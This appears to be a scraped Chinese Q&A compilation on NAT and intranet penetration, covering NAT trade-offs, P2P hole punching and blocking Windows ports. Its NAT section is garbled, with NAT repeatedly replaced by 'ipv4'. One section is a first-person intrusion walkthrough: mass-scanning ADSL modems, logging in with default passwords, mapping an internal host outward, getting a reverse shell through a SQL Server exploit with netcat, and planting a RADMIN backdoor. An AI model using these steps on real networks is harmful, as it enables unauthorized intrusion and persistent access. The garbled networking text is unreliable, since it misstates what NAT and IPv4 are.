ipv4内网穿透优劣

ipv4优点：1.ipv4允许对内部网实行私有编址，从而维护合法注册的公有编址方案。ipv4通过应用程序端口级别的多路复用节省了地址。利用ipv4过载，对于所有外部通信，内部主机可以共享一个公有 IP地址。在这种配置类型中，支持很多内部主机只需极少的外部地址。2.ipv4增强了与公有网络连接的灵活性。为了确保可靠的公有网络连接，可以实施多池、备用池和负载均衡池。3.ipv4为内部网络编址方案提供了一致性。在没有私有IP地址和ipv4的网络上，更改公有IP地址需要给现有网络上的所有主机重新编号。主机重新编号的成本可能非常高。NAT 允许保留现有方案，同时支持新的公有编址方案。这意味着，组织可以更换ISP而不需要更改任何内部客户端。4.ipv4提供了网络安全性。由于私有网络在实施 NAT 时不会通告其地址或内部拓扑，因此在实现受控外部访问的同时能确保安全。不过，ipv4不能取代防火墙。

_pv4缺点：1.影响性能。转换数据包报头内的每个IP地址需要时间，因此ipv4会增加交换延迟。第一个数据包采用过程交换，意味着它始终经过较慢的路径。路由器必须查看每个数据包，以决定是否需要转换。路由器需要更改IP报头，甚至可能要更改TCP或UDP报头。如果缓存条目存在，则其余数据包经过快速交换路径，否则也会被延迟。2.许多 Internet 协议和应用程序依赖端到端功能，需要将未经修改的数据包从源转发到目的地。ipv4会更改端到端地址，因此会阻止一些使用IP寻址的应用程序。例如，一些安全应用程序（例如数字签名）会因为源IP地址改变而失败。使用物理地址而非限定域名的应用程序无法到达经过 NAT 路由器转换的目的地。有时，通过实施静态ipv4映射可避免此问题。3.端到端IP可追溯性也会丧失。由于经过多个ipv4地址转换点，数据包地址已改变很多次，因此追溯数据包将更加困难，排除故障也更具挑战性。另一方面，试图确定数据包源的黑客也会发现难以追溯或获得原始源地址或目的地址。4.使用ipv4也会使隧道协议（例如IPsec）更加复杂，因为 ipv4会修改报头中的值，从而干扰IPsec和其它隧道协议执行的完整性检查。5.需要外部网络发起TCP连接的一些服务，或者无状态协议（诸如使用 UDP 的无状态协议），可能被中断。除非ipv4路由器做出特别努力来支持此类协议，否则传入的数据包将无法到达目的地。一些协议可以支持参与通信的双方中的一方采用NAT机制（例如被动模式 FTP），但是当两个系统均通过NAT与Internet分隔时，这些协议会失败。6.简单来说通过ipv4接入网络，不仅是网络变的复杂的同时还会降低网络性能。其实我们大多数人对于网络性能可能并没有那么在意，主要的是复杂性，我们的监控或者私人云存储等根本就很难接入。现阶段IPv6发力发展，已经逐渐可以改变这些弊端了，不过此刻因为NAT技术的成熟，更多是安于现状。目前来说NAT会成了逐渐阻碍互联网发展的绊脚石。

_AT技术大行其道，实际上我们要理解起来还是十分容易的，我们现在用的地址都是IPV4，这个地址量比较少。一共加起来应该只有40亿个，不够人手一个，而且大部分都掌握在欧美国家之中。据一些资料所描述我们掌握其中3亿对个IPV4的公网地址。正是因为如此，NAT大行其道，他根据不同端口来进行让我们多人用一个公网IP进行与互联网交互。

连接学校内网的wifi是可以访问外网的，怎样才能做到4g或者连接其他wifi状况下访问学校内网？？

内网就是专门为内部网站使用，不连接内部网络就进入内部网站，这个在手机上不可能的，内部网站屏蔽了外部网络访问，除非是黑客在电脑上黑进去，正常情况不可能的。

可穿透内网的远程控制软件哪款好

网灵一号，该软件操作非常简单，采用业内最先进的P2P 技术穿透内网，不用在路由器上做端口映射，也不需借助动态域名等复杂手段。甚至无须知道受控端的IP 等信息，没有任何关于连接方面的设置，就是不懂网络知识的用户也能很快学会使用。

连接到其它网络（或是共享别的网络）

汗了~~首先很负责的告诉你，你的电脑设施没有任何问题，玩QQ慢纯粹是网路的问题。

QQ游戏用的是电信的网络，而视讯宽带是属于网通的。

网通在QQ游戏里先天不足，本来就慢的可以，唯一的解决办法是建议你尽量选择与自己网络性质相同的服务器和房间登陆进行游戏。

从技术层面来说，你在家里把网络连接到公司，我不知道这是否算黑客行为，建议不要这样。

或者你直接去安装电信的网路，把视讯宽带撤了。

没有路由器的学校内网用户怎样实现内网穿透达到电驴的High ID？

不要忙了，路由器端口映射是指有网络权限的，你所在内网你没有任何权限，除了你在外网还有台机器开着和你连接作个代理外，你无法得到更多权限了，除非你黑了网管。但我上面的方法太费钱了，也完全没有必要，你不是想当黑客偷资料的话，可以不需要再作任何努力。因为网管已经限制了你的端口，你所以下载受限。我想我这是最佳答案了

如何入侵一台裸server2003

下面介绍如何在xp/2k/2003下手动关闭这些网络端口。

1、点击 "开始菜单/设置/控制面板/管理工具"，双击打开"本地策略"，选中"ip安全策略，在本地计算机“右边的空白位置右击鼠标，弹出快捷菜单，选择"创建ip安全策略”，弹出向导。在向导中点击下一步，下一步，当显示“安全通信请求”画面时，把“激活默认相应规则”左边的钩去掉，点“完成”就创建了一个新的ip安全策略。

2、右击该ip安全策略，在“属性”对话框中，把“使用添加向导”左边的钩去掉，然后再点击右边的“添加”按纽添加新的规则，随后弹出“新规则属性”对话框，在画面上点击“添加”按纽，弹出ip筛选器列表窗口。在列表中，首先把“使用添加向导”左边的钩去掉，然后再点击右边的"添加"按纽添加新的筛选器。

3、进入“筛选器属性”对话框，首先看到的是寻地址，源地址选“任何ip地址”，目标地址选“我的ip地址”，点击“协议”选项卡，在“选择协议类型”的下拉列表中选择“tcp”，然后在“到此端口”的下的文本框中输入“135”，点击确定。这样就添加了一个屏蔽tcp135 端口的筛选器，可以防止外界通过135端口连上你的电脑。

点击确定后回到筛选器列表的对话框，可以看到已经添加了一条策略。重复以上步骤继续添加tcp 137 139 445 593 端口和udp 135 139 445 端口，为它们建立相应的筛选器。

重复以上步骤添加tcp 125 2745 3127 6129 3389 端口的屏蔽策略，建立好上述端口的筛选器，最后点击确定按纽。

4、在“新规则属性”对话框中，选择“新ip筛选器列表”然后点击其左边的复选框，表示已经激活。最后点击“筛选器操作”选项卡中，把“使用添加向导”左边的钩去掉，点击“添加”按钮，进行“阻止”操作，在“新筛选器操作属性”的“安全措施”选项卡中，选择“阻止”，然后点击“确定”。

5、进入“新规则属性”对话框，点击“新筛选器操作”，选取左边的复选框，表示已经激活，点击“关闭”按钮，关闭对话框。最后“新ip安全策略属性”对话框，在“新的ip筛选器列表”左边打钩，按确定关闭对话框。在“本地安全策略”窗口，用鼠标右击新添加的ip安全策略，然后选择“指派”。

重新启动后，上述端口就可以关闭了!电脑就安全多了!!!

也许看烂了网上已有的常规黑客攻击手段，对一些陈旧的入侵手法早已厌烦，近来我对ADSL Modem的路由功能产生了浓厚的兴趣，经过一番努力，我终于找到了穿透ADSL路由入侵内网的方法，在这里和各位一起分享我的心得。

一、扫描

现在很多ADSL MODEM都是通过 80 23 21 三个端口来管理，但80 21端口有很多服务器都有打开，没怎么特征性，于是我选择了23端口，打开我的至爱：SUPPERSCAN，填上我所在地区的IP段，(跨多几段都没关系，反正SUPPERSCAN的速度就是快)眨眼间，结果出来了，开23的主机还真不小啊:)我挑了几台出来，在浏览器那里输入IP：218.xxx.xxx.xxx，OK。登陆对话框出来了，输入USER：ADSL pass:adsl1234（因为我这里的adsl modem一般是华硕的，缺省是adsl adsl1234）bingle 一矢中的，现在我就是上帝。

二、映射

入侵已经成功了一半，要进一步入侵内网，我们要进行端口映射，但是我连内网的拓扑，都不知道（更不用说内网主机的端口开放情况了）又怎么映射呢?在此，我选择了猜测。一般来说，MODEM的内网IP缺省是192.168.1.1，而大多数就把自己主机的IP设成192.168.1.2。因此我们只要试试把192.168.1.2的端口映射出来就行了（但如果使用了dhcp就麻烦了）。但是192.168.1.2到底开放了什么端口，我们根本就不知道啊，呵呵，既然不知道，那么我就把他整台主机透明地映射到外网，具体做法如下:进入NAT选项---添加NAT规则---BAMID---填入主机IP:192.168.1.2，到此192.168.1.2已经透明地映射到192.168.1.1上了，我们访问ADSL MODEM就等于访问主机192.168.1.2了。 三、检测漏洞

现在我们再请出SUPPERSCAN对218.xxx.xxx.xxx进行扫描，呵，看到没有？扫描结果已经不同了，开放的端口是139 1433等，刚才只是开放了80 23 21 而已（也就是说我们的映射已经成功了）该是X-SCAN出手了，用它来扫弱口令最好不过了，但扫描的结果令人失望，一个弱口令也没有，看来管理员还不算低B啊。

四、溢出

既然没有弱口令，也没开80，那只好从溢出方面着手了，但没开80 21 也就webdav .sevr-u的溢出没戏了，很自然，我向导了RPC溢出，但实践证明RPC溢出也是不行的，LSASS溢出也不行 。

五、募然回首，那人却在，灯火阑珊处

看来这管理员还是比较负责的，该打的补丁都打上了，这时侯，我的目光转移到1433上了（嘿，不知道他打了SQL补丁没有？）心动不如行动，现在只好死马当活马医了，于是:

nc -v -l 99

sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99

bingle 成功地得到一个shell了。

六、设置后门

到这里，我们的入侵已经成功了，余下的是扫尾留后门，至于后门，我一般都是用FTP上传RADMIN上去的，呵呵，这里不详谈了，相信各位都知道。

黑客是不是只能入侵有公网IP的计算机

不完全是，但是内网IP确实是不能直接成为攻击目标的。

首先，没有公网IP不是说就不用公网IP连入互联网了，如果你学过NAT，就应该知道目前主要是用第三类NAT 端口网络地址转换（PNAT）来解决IPv4地址不足的问题的。

也就是说，你在上网时，数据包途经出口NAT设备，会把内网IP转化为公网IP+端口信息，当外部数据包回访时，携带的端口信息会重新转化为内网IP。

但是，即使获取到这个端口号以及对方的公网IP，也是无法直接访问的，因为主动访问这些端口的数据包在到达NAT设备之后，会被当做无效非法的数据包被丢弃。除非双方事先协商好，在中间架设服务器，用内网穿透技术，这个你可以另外去了解。

说穿了，只要你设备在使用内网IP，假设同一个局域网环境是安全的，那么你的设备的安全性就很高。

其次，有些黑客可以通过0day漏洞入侵外层的路由交换设备，从而监听或者入侵你的内网设备。

不过讲真的，能有找到路由器0day的黑客，一般水平都是大佬级别。或者很有钱，买了一个0day漏洞，这样做成本太大，如果不是特别重要的活动，得不偿失。

再其次，黑客一般是通过诱骗用户登陆伪造的网站或者下载文件夹带私货的文件，来植入木马去攻击内网设备，此时黑客可以通过木马对内网设备提权，主动和自己通信，实现入侵。

当然，如果用户不自己作死，一般中招的概率也很低。

VC怎么实现内网穿透

不怎么明白LZ的描述哈。

路由器1 2 对于与路由器3并行的内网来说，IP均为 192.168.0.1 这个好理解。

但是如何绑定别的机子的SOCKET我还是第一次听说哈，绑定貌似只能绑定本地的SOCKET和本地的端口。

楼主的意思是不是：用192.168.0.2这个IP给另外一个网段的192.168.0.2

发送数据？虽然描述得不是很清晰。毕竟，把电脑IP设置成路由器的IP，会造成一定问题，甚至很多都会提示IP冲突。

如果楼主是我说的那个意思，那么，很遗憾的告诉你，还真没办法直接发送数据。

这样的情况就像两个都是内网的机子进行通信。

要想实现这种通信，楼主可以去搜索下P2P技术。

大概意思是先让两台电脑联系上公共的主机。建立相应的路由路径...然后由主机指挥他们打洞，实现直接通信。

就像QQ一样，两台都是内网的机子（不同网段），不可能实现直接指定IP就能发送数据（这样的IP太多了，成千上万的192.168.0.*，且该网段属于保留网段，指定此IP只能用于同一网段（局域网）的机器进行通信）。

这样会造成数据发送到本网段的该IP机器上。这时，QQ服务器就出现了...

登录的时候就会传递一个路由路径...这个传递的地址会有一定的有效期，所以就需要定时或不定时(有效期内可自由设定)发送心跳包...用以表示还存活着。

然后服务器回应，表示收到数据。这时，如果好友之间进行聊天，就出现两种情况：1.数据完全由服务器进行转发。2.服务器让他们建立p2p连接直接通信....

希望楼主能理解。跨网段的内部机器是不能直接指定IP通信的。必须借助服务器转发或者用服务器实现p2p。

至于p2p，楼主可以去网上搜索下，文章很多，也有直接代码的。

希望采纳哇，累死我了。